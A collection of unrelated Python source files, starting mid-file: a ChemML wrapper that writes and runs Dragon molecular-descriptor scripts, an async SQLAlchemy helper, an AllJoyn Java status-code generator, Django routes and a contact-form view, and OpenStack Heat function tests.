OPTIONS.append(objectify.Element("MaxSR", value=self.MaxSR))
OPTIONS.append(objectify.Element("MaxSRDetour", value=self.MaxSRDetour))
OPTIONS.append(objectify.Element("MaxAtomWalkPath", value=self.MaxAtomWalkPath))
OPTIONS.append(objectify.Element("LogPathWalk", value=bool_formatter(self.LogPathWalk)))
OPTIONS.append(objectify.Element("LogEdge", value=bool_formatter(self.LogEdge)))
Weights = objectify.SubElement(OPTIONS, "Weights")
for weight in self.Weights:
if weight not in [
"Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
"I-State"
]:
msg = "'%s' is not a valid weight type." % weight
raise ValueError(msg)
Weights.append(objectify.Element('weight', name=weight))
OPTIONS.append(
objectify.Element("SaveOnlyData", value=bool_formatter(self.SaveOnlyData)))
OPTIONS.append(
objectify.Element(
"SaveLabelsOnSeparateFile", value=bool_formatter(self.SaveLabelsOnSeparateFile)))
OPTIONS.append(objectify.Element("SaveFormatBlock", value=self.SaveFormatBlock))
OPTIONS.append(objectify.Element("SaveFormatSubBlock", value=self.SaveFormatSubBlock))
OPTIONS.append(
objectify.Element("SaveExcludeMisVal", value=bool_formatter(self.SaveExcludeMisVal)))
OPTIONS.append(
objectify.Element(
"SaveExcludeAllMisVal", value=bool_formatter(self.SaveExcludeAllMisVal)))
OPTIONS.append(
objectify.Element("SaveExcludeConst", value=bool_formatter(self.SaveExcludeConst)))
OPTIONS.append(
objectify.Element(
"SaveExcludeNearConst", value=bool_formatter(self.SaveExcludeNearConst)))
OPTIONS.append(
objectify.Element("SaveExcludeStdDev", value=bool_formatter(self.SaveExcludeStdDev)))
OPTIONS.append(objectify.Element("SaveStdDevThreshold", value=self.SaveStdDevThreshold))
OPTIONS.append(
objectify.Element(
"SaveExcludeCorrelated", value=bool_formatter(self.SaveExcludeCorrelated)))
OPTIONS.append(objectify.Element("SaveCorrThreshold", value=self.SaveCorrThreshold))
OPTIONS.append(
objectify.Element(
"SaveExclusionOptionsToVariables",
value=bool_formatter(self.SaveExclusionOptionsToVariables)))
OPTIONS.append(
objectify.Element(
"SaveExcludeMisMolecules", value=bool_formatter(self.SaveExcludeMisMolecules)))
OPTIONS.append(
objectify.Element(
"SaveExcludeRejectedMolecules",
value=bool_formatter(self.SaveExcludeRejectedMolecules)))
DESCRIPTORS = objectify.SubElement(self.dragon, "DESCRIPTORS")
for i in self.blocks:
if i < 1 or i > 29:
msg = "block id must be in range 1 to 29."
raise ValueError(msg)
DESCRIPTORS.append(objectify.Element('block', id="%i" % i, SelectAll="true"))
MOLFILES = objectify.SubElement(self.dragon, "MOLFILES")
MOLFILES.append(objectify.Element("molInput", value=self.molInput))
# if self.molInput == "stdin":
# if self.molInputFormat not in ['SYBYL', 'MDL', 'HYPERCHEM', 'SMILES', 'MACROMODEL']:
# msg = "'%s' is not a valid molInputFormat. Formats:['SYBYL','MDL','HYPERCHEM','SMILES','MACROMODEL']" % self.molInputFormat
# raise ValueError(msg)
# MOLFILES.append(objectify.Element("molInputFormat", value=self.molInputFormat))
if self.molInput == "file":
if isinstance(self.molFile, dict):
for f in range(1, len(self.molFile) + 1):
MOLFILES.append(objectify.Element("molFile", value=self.molFile[f]['file']))
elif isinstance(self.molFile, str):
MOLFILES.append(objectify.Element("molFile", value=self.molFile))
else:
msg = 'Variable molInput can be either a string or a list'
raise ValueError(msg)
else:
msg = "The molInput value must be 'file'. 'stdin' is not supported through ChemML"
raise ValueError(msg)
OUTPUT = objectify.SubElement(self.dragon, "OUTPUT")
OUTPUT.append(objectify.Element("SaveStdOut", value=bool_formatter(self.SaveStdOut)))
OUTPUT.append(objectify.Element("SaveProject", value=bool_formatter(self.SaveProject)))
if self.SaveProject:
OUTPUT.append(objectify.Element("SaveProjectFile", value=self.SaveProjectFile))
OUTPUT.append(objectify.Element("SaveFile", value=bool_formatter(self.SaveFile)))
if self.SaveFile:
OUTPUT.append(objectify.Element(
"SaveType", value=self.SaveType)) # value = "[singlefile/block/subblock]"
OUTPUT.append(
objectify.Element(
"SaveFilePath", value=self.output_directory + self.SaveFilePath)
) #Specifies the file name for saving results as a plan text file(s), if the "singlefile" option is set; if "block" or "subblock" are set, specifies the path in which results files will be saved.
OUTPUT.append(objectify.Element("logMode",
value=self.logMode)) # value = [none/stderr/file]
if self.logMode == "file":
OUTPUT.append(
objectify.Element("logFile", value=self.output_directory + self.logFile))
if self.external:
EXTERNAL = objectify.SubElement(self.dragon, "EXTERNAL")
EXTERNAL.append(objectify.Element("fileName", value=self.fileName))
EXTERNAL.append(objectify.Element("delimiter", value=self.delimiter))
EXTERNAL.append(
objectify.Element(
"consecutiveDelimiter", value=bool_formatter(self.consecutiveDelimiter)))
EXTERNAL.append(objectify.Element("MissingValue", value=self.MissingValue))
self._save_script()
elif self.version == 7:
self.dragon = objectify.Element(
"DRAGON",
version="%i.0.0" % self.version,
description="Dragon7 - FP1 - MD5270",
script_version="1",
generation_date=std_datetime_str('date').replace('-', '/'))
OPTIONS = objectify.SubElement(self.dragon, "OPTIONS")
OPTIONS.append(
objectify.Element("CheckUpdates", value=bool_formatter(self.CheckUpdates)))
OPTIONS.append(
objectify.Element(
"PreserveTemporaryProjects",
value=bool_formatter(self.PreserveTemporaryProjects)))
OPTIONS.append(objectify.Element("SaveLayout", value=bool_formatter(self.SaveLayout)))
# OPTIONS.append(objectify.Element("ShowWorksheet", value = bool_formatter(self.ShowWorksheet)))
OPTIONS.append(objectify.Element("Decimal_Separator", value=self.Decimal_Separator))
if self.Missing_String == "NaN": self.Missing_String = "na"
OPTIONS.append(objectify.Element("Missing_String", value=self.Missing_String))
OPTIONS.append(objectify.Element("DefaultMolFormat", value=self.DefaultMolFormat))
# OPTIONS.append(objectify.Element("HelpBrowser", value = self.HelpBrowser))
OPTIONS.append(
objectify.Element(
"RejectDisconnectedStrucuture",
value=bool_formatter(self.RejectDisconnectedStrucuture)))
OPTIONS.append(
objectify.Element(
"RetainBiggestFragment", value=bool_formatter(self.RetainBiggestFragment)))
OPTIONS.append(
objectify.Element(
"RejectUnusualValence", value=bool_formatter(self.RejectUnusualValence)))
OPTIONS.append(
objectify.Element("Add2DHydrogens", value=bool_formatter(self.Add2DHydrogens)))
OPTIONS.append(
objectify.Element(
"DisconnectedCalculationOption", value=self.DisconnectedCalculationOption))
OPTIONS.append(objectify.Element("MaxSRforAllCircuit", value=self.MaxSRforAllCircuit))
# OPTIONS.appendm(objectify.Element("MaxSR", value = self.MaxSR))
OPTIONS.append(objectify.Element("MaxSRDetour", value=self.MaxSRDetour))
OPTIONS.append(objectify.Element("MaxAtomWalkPath", value=self.MaxAtomWalkPath))
OPTIONS.append(
objectify.Element("RoundCoordinates", value=bool_formatter(self.RoundCoordinates)))
OPTIONS.append(
objectify.Element("RoundWeights", value=bool_formatter(self.RoundWeights)))
OPTIONS.append(objectify.Element("LogPathWalk", value=bool_formatter(self.LogPathWalk)))
OPTIONS.append(objectify.Element("LogEdge", value=bool_formatter(self.LogEdge)))
Weights = objectify.SubElement(OPTIONS, "Weights")
for weight in self.Weights:
if weight not in [
"Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
"I-State"
]:
msg = "'%s' is not a valid weight type." % weight
raise ValueError(msg)
Weights.append(objectify.Element('weight', name=weight))
OPTIONS.append(
objectify.Element("SaveOnlyData", value=bool_formatter(self.SaveOnlyData)))
OPTIONS.append(
objectify.Element(
"SaveLabelsOnSeparateFile", value=bool_formatter(self.SaveLabelsOnSeparateFile)))
OPTIONS.append(objectify.Element("SaveFormatBlock", value=self.SaveFormatBlock))
OPTIONS.append(objectify.Element("SaveFormatSubBlock", value=self.SaveFormatSubBlock))
OPTIONS.append(
objectify.Element("SaveExcludeMisVal", value=bool_formatter(self.SaveExcludeMisVal)))
OPTIONS.append(
objectify.Element(
"SaveExcludeAllMisVal", value=bool_formatter(self.SaveExcludeAllMisVal)))
OPTIONS.append(
objectify.Element("SaveExcludeConst", value=bool_formatter(self.SaveExcludeConst)))
OPTIONS.append(
objectify.Element(
"SaveExcludeNearConst", value=bool_formatter(self.SaveExcludeNearConst)))
OPTIONS.append(
objectify.Element("SaveExcludeStdDev", value=bool_formatter(self.SaveExcludeStdDev)))
OPTIONS.append(objectify.Element("SaveStdDevThreshold", value=self.SaveStdDevThreshold))
OPTIONS.append(
objectify.Element(
"SaveExcludeCorrelated", value=bool_formatter(self.SaveExcludeCorrelated)))
OPTIONS.append(objectify.Element("SaveCorrThreshold", value=self.SaveCorrThreshold))
OPTIONS.append(
objectify.Element(
"SaveExclusionOptionsToVariables",
value=bool_formatter(self.SaveExclusionOptionsToVariables)))
OPTIONS.append(
objectify.Element(
"SaveExcludeMisMolecules", value=bool_formatter(self.SaveExcludeMisMolecules)))
OPTIONS.append(
objectify.Element(
"SaveExcludeRejectedMolecules",
value=bool_formatter(self.SaveExcludeRejectedMolecules)))
OPTIONS.append(
objectify.Element(
"RoundDescriptorValues", value=bool_formatter(self.RoundDescriptorValues)))
DESCRIPTORS = objectify.SubElement(self.dragon, "DESCRIPTORS")
for i in self.blocks:
if i < 1 or i > 30:
msg = "block id must be in range 1 to 30."
raise ValueError(msg)
DESCRIPTORS.append(objectify.Element('block', id="%i" % i, SelectAll="true"))
MOLFILES = objectify.SubElement(self.dragon, "MOLFILES")
MOLFILES.append(objectify.Element("molInput", value=self.molInput))
# if self.molInput == "stdin":
# if self.molInputFormat not in [
# 'SYBYL', 'MDL', 'HYPERCHEM', 'SMILES', 'CML', 'MACROMODEL'
# ]:
# msg = "'%s' is not a valid molInputFormat. Formats:['SYBYL','MDL','HYPERCHEM','SMILES','CML','MACROMODEL']" % self.molInputFormat
# raise ValueError(msg)
# MOLFILES.append(objectify.Element("molInputFormat", value=self.molInputFormat))
if self.molInput == "file":
if isinstance(self.molFile, dict):
for f in range(1, len(self.molFile) + 1):
MOLFILES.append(objectify.Element("molFile", value=self.molFile[f]['file']))
elif isinstance(self.molFile, str):
MOLFILES.append(objectify.Element("molFile", value=self.molFile))
else:
msg = 'Variable molFile can be either a string or a list'
raise ValueError(msg)
else:
msg = "The molInput value must be 'file'. 'stdin' is not supported through ChemML"
raise ValueError(msg)
OUTPUT = objectify.SubElement(self.dragon, "OUTPUT")
OUTPUT.append(objectify.Element("knimemode", value=bool_formatter(self.knimemode)))
OUTPUT.append(objectify.Element("SaveStdOut", value=bool_formatter(self.SaveStdOut)))
OUTPUT.append(objectify.Element("SaveProject", value=bool_formatter(self.SaveProject)))
if self.SaveProject:
OUTPUT.append(objectify.Element("SaveProjectFile", value=self.SaveProjectFile))
OUTPUT.append(objectify.Element("SaveFile", value=bool_formatter(self.SaveFile)))
if self.SaveFile:
OUTPUT.append(objectify.Element(
"SaveType", value=self.SaveType)) # value = "[singlefile/block/subblock]"
OUTPUT.append(
objectify.Element(
"SaveFilePath", value=self.output_directory + self.SaveFilePath)
) #Specifies the file name for saving results as a plan text file(s), if the "singlefile" option is set; if "block" or "subblock" are set, specifies the path in which results files will be saved.
OUTPUT.append(objectify.Element("logMode",
value=self.logMode)) # value = [none/stderr/file]
if self.logMode == "file":
OUTPUT.append(
objectify.Element("logFile", value=self.output_directory + self.logFile))
if self.external:
EXTERNAL = objectify.SubElement(self.dragon, "EXTERNAL")
EXTERNAL.append(objectify.Element("fileName", value=self.fileName))
EXTERNAL.append(objectify.Element("delimiter", value=self.delimiter))
EXTERNAL.append(
objectify.Element(
"consecutiveDelimiter", value=bool_formatter(self.consecutiveDelimiter)))
EXTERNAL.append(objectify.Element("MissingValue", value=self.MissingValue))
self._save_script()
else:
doc = etree.parse(script)
self.dragon = etree.tostring(doc) # dragon script : dragon
self.dragon = objectify.fromstring(self.dragon)
objectify.deannotate(self.dragon)
etree.cleanup_namespaces(self.dragon)
if self.dragon.attrib['version'][0] not in ['6', '7']:
msg = "Dragon script is not labeled to the newest vesions of Dragon, 6 or 7. This may causes some problems."
warnings.warn(msg, RuntimeWarning)
mandatory_nodes = ['OPTIONS', 'DESCRIPTORS', 'MOLFILES', 'OUTPUT']
reported_nodes = [element.tag for element in self.dragon.iterchildren()]
if not set(reported_nodes).issuperset(set(mandatory_nodes)):
msg = "Dragon script doesn't contain all required nodes, which are:%s" % str(
mandatory_nodes)
raise ValueError(msg)
self.drs = script
self.data_path = self.dragon.OUTPUT.SaveFilePath.attrib['value']
return self
def _save_script(self):
# objectify.deannotate(self.dragon)
etree.cleanup_namespaces(self.dragon)
self.drs_name = 'Dragon_script.drs'
with open(os.path.join(self.output_directory, self.drs_name), 'w') as outfile:
outfile.write(etree.tostring(self.dragon, pretty_print=True).decode())
def printout(self):
objectify.deannotate(self.dragon)
etree.cleanup_namespaces(self.dragon)
print(objectify.dump(self.dragon))
def run(self):
t0 = time.time()
print("running Dragon%i ..." % self.version)
os_ret = os.system('nohup dragon%sshell -s %s' %
(self.version, os.path.join(self.output_directory, self.drs_name)))
if os_ret != 0:
msg = "Oops, dragon%ishell command didn't work! Are you sure Dragon%i software is installed on your machine?" % (
self.version, self.version)
raise ImportError(msg)
# execution time
tmp_str = tot_exec_time_str(t0)
print("... Dragon job completed in %s"%tmp_str)
# print subprocess.check_output(['nohup dragon%sshell -s %s'%(self.version,self.drs)])
def convert_to_csv(self, remove=True):
"""
This function converts the tab-delimited txt file from Dragon to pandas dataframe.
Note that this process might require large memory based on the number of data points and features.
Parameters
----------
remove: bool, optional (default = True)
if True, the original descriptors file (Dragon_descriptors.txt) will be removed.
Returns
-------
pandas.DataFrame
The 2D dataframe of the descriptors. Note that the first two columns are 'No.' and 'NAME'.
"""
# convert to csv file
t0 = time.time()
print("converting output file to csv format ...")
df = pd.read_csv(self.data_path, sep=None, engine='python')
# df = df.drop(['No.', 'NAME'], axis=1)
# execution time
tmp_str = tot_exec_time_str(t0)
# remove original tab delimited file
if remove:
os.remove(self.data_path)
self.data_path = None
print("... conversion completed in %s"%tmp_str)
return df
|
from sqlalchemy.ext.asyncio import create_async_engine
from ..utils.config import Config
from ..utils.singleton import Singleton
class Database(Singleton):
def __init__(self):
self.engine = create_async_engine(Config.url, echo=True, future=True, pool_pre_ping=True)
async def execute(self, sql):
async with self.engine.begin() as conn:
result = await conn.execute(sql)
return result
|
#!/usr/bin/python
# Copyright (c) Open Connectivity Foundation (OCF), AllJoyn Open Source
# Project (AJOSP) Contributors and others.
#
# SPDX-License-Identifier: Apache-2.0
#
# All rights reserved. This program and the accompanying materials are
# made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Copyright (c) Open Connectivity Foundation and Contributors to AllSeen
# Alliance. All rights reserved.
#
# Permission to use, copy, modify, and/or distribute this software for
# any purpose with or without fee is hereby granted, provided that the
# above copyright notice and this permission notice appear in all
# copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
import sys
import os
import getopt
from xml.dom import minidom
from xml.sax.saxutils import escape
if sys.version_info[:3] < (2,4,0):
from sets import Set as set
includeSet = set()
def openFile(name, type):
try:
return open(name, type)
except IOError, e:
errno, errStr = e
print "I/O Operation on %s failed" % name
print "I/O Error(%d): %s" % (errno, errStr)
raise e
def main(argv=None):
"""
make_status --code <code_file> --base <base_dir> [--deps <dep_file>] [--help]
Where:
<code_file> - Output "Java" code
<base_dir> - Root directory for xi:include directives
<dep_file> - Ouput makefile dependency file
"""
global codeOut
global depOut
global isFirst
global fileArgs
global baseDir
codeOut = None
depOut = None
isFirst = True
baseDir = ""
if argv is None:
argv = sys.argv[1:]
try:
opts, fileArgs = getopt.getopt(argv, "h", ["help", "code=", "dep=", "base="])
for o, a in opts:
if o in ("-h", "--help"):
print __doc__
return 0
if o in ("--code"):
codeOut = openFile(a, 'w')
if o in ("--dep"):
depOut = openFile(a, 'w')
if o in ("--base"):
baseDir = a
if None == codeOut:
raise Error("Must specify --code")
writeHeaders()
for arg in fileArgs:
ret = parseDocument(arg)
writeFooters()
if None != codeOut:
codeOut.close()
if None != depOut:
depOut.close()
except getopt.error, msg:
print msg
print "for help use --help"
return 1
except Exception, e:
print "ERROR: %s" % e
if None != codeOut:
os.unlink(codeOut.name)
if None != depOut:
os.unlink(depOut.name)
return 1
return 0
def writeHeaders():
global codeOut
global depOut
global fileArgs
if None != depOut:
depOut.write("%s %s %s:" % (depOut.name, codeOut.name))
for arg in fileArgs:
depOut.write(" \\\n %s" % arg)
if None != codeOut:
codeOut.write("""/* This file is auto-generated. Do not modify. */
/*
* Copyright (c) Open Connectivity Foundation (OCF), AllJoyn Open Source
* Project (AJOSP) Contributors and others.
*
* SPDX-License-Identifier: Apache-2.0
*
* All rights reserved. This program and the accompanying materials are
* made available under the terms of the Apache License, Version 2.0
* which accompanies this distribution, and is available at
* http://www.apache.org/licenses/LICENSE-2.0
*
* Copyright (c) Open Connectivity Foundation and Contributors to AllSeen
* Alliance. All rights reserved.
*
* Permission to use, copy, modify, and/or distribute this software for
* any purpose with or without fee is hereby granted, provided that the
* above copyright notice and this permission notice appear in all
* copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL
* WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
* AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
* DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
* PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
* TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
* PERFORMANCE OF THIS SOFTWARE.
*/
package org.alljoyn.bus;
/**
* Standard function return codes for this package.
*/
public enum Status {
""")
def writeFooters():
global codeOut
global depOut
if None != depOut:
depOut.write("\n")
if None != codeOut:
codeOut.write(""";
/** Error Code */
private int errorCode;
/** Constructor */
private Status(int errorCode) {
this.errorCode = errorCode;
}
/** Static constructor */
private static Status create(int errorCode) {
for (Status s : Status.values()) {
if (s.getErrorCode() == errorCode) {
return s;
}
}
return NONE;
}
/**
* Gets the numeric error code.
*
* @return the numeric error code
*/
public int getErrorCode() { return errorCode; }
}
""")
def parseDocument(fileName):
dom = minidom.parse(fileName)
for child in dom.childNodes:
if child.localName == 'status_block':
parseStatusBlock(child)
elif child.localName == 'include' and child.namespaceURI == 'http://www.w3.org/2001/XInclude':
parseInclude(child)
dom.unlink()
def parseStatusBlock(blockNode):
global codeOut
global isFirst
offset = 0
for node in blockNode.childNodes:
if node.localName == 'offset':
offset = int(node.firstChild.data, 0)
elif node.localName == 'status':
if isFirst:
if None != codeOut:
codeOut.write("\n /** <b><tt>%s</tt></b> %s. */" % (escape(node.getAttribute('value')), escape(node.getAttribute('comment'))))
codeOut.write("\n %s(%s)" % (node.getAttribute('name')[3:], node.getAttribute('value')))
isFirst = False
else:
if None != codeOut:
codeOut.write(",\n /** <b><tt>%s</tt></b> %s. */" % (escape(node.getAttribute('value')), escape(node.getAttribute('comment'))))
codeOut.write("\n %s(%s)" % (node.getAttribute('name')[3:], node.getAttribute('value')))
offset += 1
elif node.localName == 'include' and node.namespaceURI == 'http://www.w3.org/2001/XInclude':
parseInclude(node)
def parseInclude(includeNode):
global baseDir
global includeSet
href = os.path.join(baseDir, includeNode.attributes['href'].nodeValue)
if href not in includeSet:
includeSet.add(href)
if None != depOut:
depOut.write(" \\\n %s" % href)
parseDocument(href)
def JavaStatus(source):
return main(['--base=%s' % os.path.abspath('..'),
'--code=%s.java' % source,
'%s.xml' % source])
if __name__ == "__main__":
sys.exit(main())
|
from django.urls import path
from django.conf.urls import url
from evento import views
from .views import ConsolidadoEvento
urlpatterns = [
path('evento/', views.HomeView.as_view(), name='homeEvento'),
path('evento/<int:pk>/', views.EventoDetailView.as_view(), name='evento_detail'),
path('evento/create/', views.EventoCreateView.as_view(), name='evento_create'),
path('evento/update/<int:pk>/', views.EventoUpdateView.as_view(), name='evento_update'),
path('evento/delete/<int:pk>/', views.EventoDeleteView.as_view(), name='evento_delete'),
url(r'^ConsolidadoEvento/', ConsolidadoEvento.as_view(), name='ConsolidadoEvento'),
] |
from django.shortcuts import render
from .models import Profile, Skills
from django.core.mail import send_mail
# Create your views here.
def index(request):
profile = Profile.objects.all()
skills = Skills.objects.all()
context = {
'profile': profile,
'skills': skills,
}
if request.method == 'POST':
Name = request.POST['Name']
Email = request.POST['Email']
Message = request.POST['Message'] + ' ' + Email
send_mail(
Name,
Message,
Email,
['josphat.gitogo@gmail.com']
)
return render(request, 'index.html', context)
else:
return render(request, 'index.html', context)
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine.cfn import functions
from heat.engine import environment
from heat.engine import function
from heat.engine import resource
from heat.engine import rsrc_defn
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class TestFunction(function.Function):
def validate(self):
if len(self.args) < 2:
raise TypeError(_('Need more arguments'))
def dependencies(self, path):
return ['foo', 'bar']
def result(self):
return 'wibble'
class TestFunctionKeyError(function.Function):
def result(self):
raise TypeError
class TestFunctionValueError(function.Function):
def result(self):
raise ValueError
class TestFunctionResult(function.Function):
def result(self):
return super(TestFunctionResult, self).result()
class FunctionTest(common.HeatTestCase):
def test_equal(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
self.assertTrue(func == 'wibble')
self.assertTrue('wibble' == func)
def test_not_equal(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
self.assertTrue(func != 'foo')
self.assertTrue('foo' != func)
def test_equal_func(self):
func1 = TestFunction(None, 'foo', ['bar', 'baz'])
func2 = TestFunction(None, 'blarg', ['wibble', 'quux'])
self.assertTrue(func1 == func2)
def test_function_str_value(self):
func1 = TestFunction(None, 'foo', ['bar', 'baz'])
expected = '%s %s' % ("<heat.tests.test_function.TestFunction",
"{foo: ['bar', 'baz']} -> 'wibble'>")
self.assertEqual(expected, six.text_type(func1))
def test_function_stack_reference_none(self):
func1 = TestFunction(None, 'foo', ['bar', 'baz'])
self.assertIsNone(func1.stack)
def test_function_exception_key_error(self):
func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
expected = '%s %s' % ("<heat.tests.test_function.TestFunctionKeyError",
"{foo: ['bar', 'baz']} -> ???>")
self.assertEqual(expected, six.text_type(func1))
def test_function_eq_exception_key_error(self):
func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
func2 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
result = func1.__eq__(func2)
self.assertEqual(result, NotImplemented)
def test_function_ne_exception_key_error(self):
func1 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
func2 = TestFunctionKeyError(None, 'foo', ['bar', 'baz'])
result = func1.__ne__(func2)
self.assertEqual(result, NotImplemented)
def test_function_exception_value_error(self):
func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
expected = '%s %s' % (
"<heat.tests.test_function.TestFunctionValueError",
"{foo: ['bar', 'baz']} -> ???>")
self.assertEqual(expected, six.text_type(func1))
def test_function_eq_exception_value_error(self):
func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
func2 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
result = func1.__eq__(func2)
self.assertEqual(result, NotImplemented)
def test_function_ne_exception_value_error(self):
func1 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
func2 = TestFunctionValueError(None, 'foo', ['bar', 'baz'])
result = func1.__ne__(func2)
self.assertEqual(result, NotImplemented)
def test_function_abstract_result(self):
func1 = TestFunctionResult(None, 'foo', ['bar', 'baz'])
expected = '%s %s -> %s' % (
"<heat.tests.test_function.TestFunctionResult",
"{foo: ['bar', 'baz']}",
"{'foo': ['bar', 'baz']}>")
self.assertEqual(expected, six.text_type(func1))
def test_copy(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
self.assertEqual({'foo': ['bar', 'baz']}, copy.deepcopy(func))
class ResolveTest(common.HeatTestCase):
def test_resolve_func(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
result = function.resolve(func)
self.assertEqual('wibble', result)
self.assertIsInstance(result, str)
def test_resolve_dict(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
snippet = {'foo': 'bar', 'blarg': func}
result = function.resolve(snippet)
self.assertEqual({'foo': 'bar', 'blarg': 'wibble'}, result)
self.assertIsNot(result, snippet)
def test_resolve_list(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
snippet = ['foo', 'bar', 'baz', 'blarg', func]
result = function.resolve(snippet)
self.assertEqual(['foo', 'bar', 'baz', 'blarg', 'wibble'], result)
self.assertIsNot(result, snippet)
def test_resolve_all(self):
func = TestFunction(None, 'foo', ['bar', 'baz'])
snippet = ['foo', {'bar': ['baz', {'blarg': func}]}]
result = function.resolve(snippet)
self.assertEqual(['foo', {'bar': ['baz', {'blarg': 'wibble'}]}],
result)
self.assertIsNot(result, snippet)
class ValidateTest(common.HeatTestCase):
def setUp(self):
super(ValidateTest, self).setUp()
self.func = TestFunction(None, 'foo', ['bar', 'baz'])
def test_validate_func(self):
self.assertIsNone(function.validate(self.func))
self.func = TestFunction(None, 'foo', ['bar'])
self.assertRaisesRegexp(exception.StackValidationFailed,
'.foo: Need more arguments',
function.validate, self.func)
def test_validate_dict(self):
snippet = {'foo': 'bar', 'blarg': self.func}
function.validate(snippet)
self.func = TestFunction(None, 'foo', ['bar'])
snippet = {'foo': 'bar', 'blarg': self.func}
self.assertRaisesRegexp(exception.StackValidationFailed,
'.blarg.foo: Need more arguments',
function.validate, snippet)
def test_validate_list(self):
snippet = ['foo', 'bar', 'baz', 'blarg', self.func]
function.validate(snippet)
self.func = TestFunction(None, 'foo', ['bar'])
snippet = {'foo': 'bar', 'blarg': self.func}
self.assertRaisesRegexp(exception.StackValidationFailed,
'.blarg.foo: Need more arguments',
function.validate, snippet)
def test_validate_all(self):
snippet = ['foo', {'bar': ['baz', {'blarg': self.func}]}]
function.validate(snippet)
self.func = TestFunction(None, 'foo', ['bar'])
snippet = {'foo': 'bar', 'blarg': self.func}
self.assertRaisesRegexp(exception.StackValidationFailed,
'.blarg.foo: Need more arguments',
function.validate, snippet)
class DependenciesTest(common.HeatTestCase):
func = TestFunction(None, 'test', None)
scenarios = [
('function', dict(snippet=func)),
('nested_map', dict(snippet={'wibble': func})),
('nested_list', dict(snippet=['wibble', func])),
('deep_nested', dict(snippet=[{'wibble': ['wibble', func]}])),
]
def test_dependencies(self):
deps = list(function.dependencies(self.snippet))
self.assertIn('foo', deps)
self.assertIn('bar', deps)
self.assertEqual(2, len(deps))
class ValidateGetAttTest(common.HeatTestCase):
def setUp(self):
super(ValidateGetAttTest, self).setUp()
env = environment.Environment()
env.load({u'resource_registry':
{u'OS::Test::GenericResource': u'GenericResourceType'}})
env.load({u'resource_registry':
{u'OS::Test::FakeResource': u'OverwrittenFnGetAttType'}})
self.stack = stack.Stack(
utils.dummy_context(), 'test_stack',
template.Template({"HeatTemplateFormatVersion": "2012-12-12"},
env=env),
stack_id=str(uuid.uuid4()))
res_defn = rsrc_defn.ResourceDefinition('test_rsrc',
'OS::Test::GenericResource')
self.rsrc = resource.Resource('test_rsrc', res_defn, self.stack)
self.stack.add_resource(self.rsrc)
def test_resource_is_appear_in_stack(self):
func = functions.GetAtt(self.stack, 'Fn::GetAtt',
[self.rsrc.name, 'Foo'])
self.assertIsNone(func.validate())
def test_resource_is_not_appear_in_stack(self):
self.stack.remove_resource(self.rsrc.name)
func = functions.GetAtt(self.stack, 'Fn::GetAtt',
[self.rsrc.name, 'Foo'])
ex = self.assertRaises(exception.InvalidTemplateReference,
func.validate)
self.assertEqual('The specified reference "test_rsrc" (in unknown) '
'is incorrect.', six.text_type(ex))
def test_resource_no_attribute_with_default_fn_get_att(self):
func = functions.GetAtt(self.stack, 'Fn::GetAtt',
[self.rsrc.name, 'Bar'])
ex = self.assertRaises(exception.InvalidTemplateAttribute,
func.validate)
self.assertEqual('The Referenced Attribute (test_rsrc Bar) '
'is incorrect.', six.text_type(ex))
def test_resource_no_attribute_with_overwritten_fn_get_att(self):
res_defn = rsrc_defn.ResourceDefinition('test_rsrc',
'OS::Test::FakeResource')
self.rsrc = resource.Resource('test_rsrc', res_defn, self.stack)
self.stack.add_resource(self.rsrc)
self.rsrc.attributes_schema = {}
func = functions.GetAtt(self.stack, 'Fn::GetAtt',
[self.rsrc.name, 'Foo'])
self.assertIsNone(func.validate())
def test_get_attr_without_attribute_name(self):
ex = self.assertRaises(ValueError, functions.GetAtt,
self.stack, 'Fn::GetAtt', [self.rsrc.name])
self.assertEqual('Arguments to "Fn::GetAtt" must be '
'of the form [resource_name, attribute]',
six.text_type(ex))
